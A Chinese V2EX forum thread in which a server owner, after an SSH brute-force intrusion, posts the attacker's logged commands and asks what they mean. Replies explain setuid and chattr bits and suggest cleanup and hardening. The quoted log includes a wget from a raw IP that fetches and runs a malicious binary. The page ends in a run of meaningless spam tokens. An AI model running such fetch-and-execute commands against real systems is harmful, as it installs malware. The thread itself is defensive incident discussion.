站点密码被暴力破解留下了操作记录,有几个命令不是太理解 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
yinjian
V2EX    问与答

站点密码被暴力破解留下了操作记录,有几个命令不是太理解

  •  
  •   yinjian 2014-06-27 16:20:24 +08:00 7791 次点击
    这是一个创建于 4194 天前的主题,其中的信息可能已经有所发展或是发生改变。
    wget http://122.224.32.32:51/prfos
    chmod 7777 ./prfos
    ./prfos
    chattr +s /tmp/prfos

    chmod 7777是干嘛用的,一般不都是777吗?多的一位用意是?
    prfos我看了下是二进制文件。后面直接运行后chattr是什么用意?
    我现在改密码后将prfos删了能保证该代码不再运行了吗?
    该主机从没设域名只有内部使用,黑客是如何扫描到的,并判断出该主机上有这个账号的?
    =======
    登录的两次ip
    58.83.131.67 北京市 世纪互联
    60.190.139.34 浙江省嘉兴市 电信
    第 1 条附言    2014-06-27 17:19:29 +08:00

    附上7天的监控图
    第 2 条附言    2014-06-27 23:24:25 +08:00
    使用 @xi4oh4o 大大推荐的rkhunter扫描了下,暂时没看出什么大问题。有些waring我也不是太确定,筛选带有waring的贴一下。
    checking system commands.
    Performing file properties checks
    Checking for prerequisites [ Warning ]
    /usr/sbin/adduser [ Warning ]
    /usr/bin/ldd [ Warning ]
    /bin/which [ Warning ]

    Performing system configuration file checks
    Checking if SSH root access is allowed [ Warning ]
    Checking if syslog remote logging is allowed [ Warning ]

    Performing filesystem checks
    Checking /dev for suspicious file types [ Warning ]
    Checking for hidden files and directories [ Warning ]

    Checking application versions...
    Checking version of GnuPG [ Warning ]
    Checking version of OpenSSL [ Warning ]
    Checking version of OpenSSH [ Warning ]
    16 条回复    2014-06-28 03:05:36 +08:00
    letitbesqzr
        1
    letitbesqzr  
       2014-06-27 16:38:43 +08:00
    一般是批量集群ddos的马..
    9hills
        2
    9hills  
       2014-06-27 16:50:20 +08:00
    就不能重装下系统?删了继续跑,真是胆大
    jamesxu
        3
    jamesxu  
       2014-06-27 16:53:01 +08:00
    loginv2
        4
    loginv2  
       2014-06-27 17:02:51 +08:00
    7777 setuid
    prfos 估计是个后门之类的东西,对系统做了某些操作
    然后彻底删除这个文件 (用0填充掉)
    loginv2
        5
    loginv2  
       2014-06-27 17:04:07 +08:00
    而且,因为有HTTP服务,所以被中途抓包 或者登陆者机器的某些软件记录了操作也有可能 薄弱环节无处不在
    passluo
        6
    passluo  
       2014-06-27 17:05:24 +08:00
    ddos马
    yinjian
        7
    yinjian  
    OP
       2014-06-27 17:34:27 +08:00
    ubuntu下清ddos马有成熟点的方案没,比如类似win下的杀毒软件之类的工具?
    wubaiqing
        8
    wubaiqing  
       2014-06-27 18:45:10 +08:00   1
    chmod 7777 特殊权限S


    SBIT为1
    只对目录有效,使目录下的文件,只有文件拥有者才能删除
    如果他不属于owner,仅属于group或者other,就算他有w权限,也不能删除文件

    SGID为2
    表示运行这个程序时,是临时以这个文件的拥有组的身份运行的;
    加上SGID的文件夹,表示在这个目录下创建的文件属于目录所有的组,而不是创建人所在的组,在这个目录下创建的目录继承本目录的SGID。

    SUID为4
    SUID与SGID是一样的,惟一不同的是,运行时是以这个文件的拥有者身份来运行。
    wubaiqing
        9
    wubaiqing  
       2014-06-27 18:48:41 +08:00   1
    chattr +s /tmp/prfos

    附加属性:
    s:彻底删除文件,不可恢复。
    因为是从磁盘上删除,然后用0填充文件所在区域。
    xi4oh4o
        10
    xi4oh4o  
       2014-06-27 19:36:23 +08:00   1
    检查一下 crontab -l

    这个开源工具十分好用 http://rootkit.nl/projects/rootkit_hunter.html
    tmqhliu
        11
    tmqhliu  
       2014-06-27 23:52:34 +08:00
    几点建议

    修改SSH配置,不要在22端口上运行,否则容易被区段扫描,碰上弱密码就攻破了
    SSH配置不得允许 root 直接登录,只能允许普通用户登录,然后用 su 切换用户
    扫描显示有warning的文件,最好详细检查是否有问题,如果不能判断,一律认为有后门,果断找干净版本替换,甚至重装
    halczy
        12
    halczy  
       2014-06-28 00:00:58 +08:00
    @tmqhliu

    非22端口SSH用久了会被GFW.

    可以安装FAIL2BAN来自动封IP, 防止暴力破解.
    johnnyR
        13
    johnnyR  
       2014-06-28 00:22:04 +08:00
    @tmqhliu 我也很担心。我的是12.04版的。我还开了3389.我设置了密码22位= =不知道安全不
    9hills
        14
    9hills  
       2014-06-28 00:31:51 +08:00 via iPad
    @halczy
    @johnnyR
    @tmqhliu 禁止密码登录,只用密钥,表示随便扫,什么failban完全不用。。
    lyragosa
        15
    lyragosa  
       2014-06-28 00:33:39 +08:00
    @halczy 我了个去,还有这个说法吗……
    CupTools
        16
    CupTools  
       2014-06-28 03:05:36 +08:00
    改SSH口+CSF+OSSEC
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2455 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 32ms UTC 11:08 PVG 19:08 LAX 03:08 JFK 06:08
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86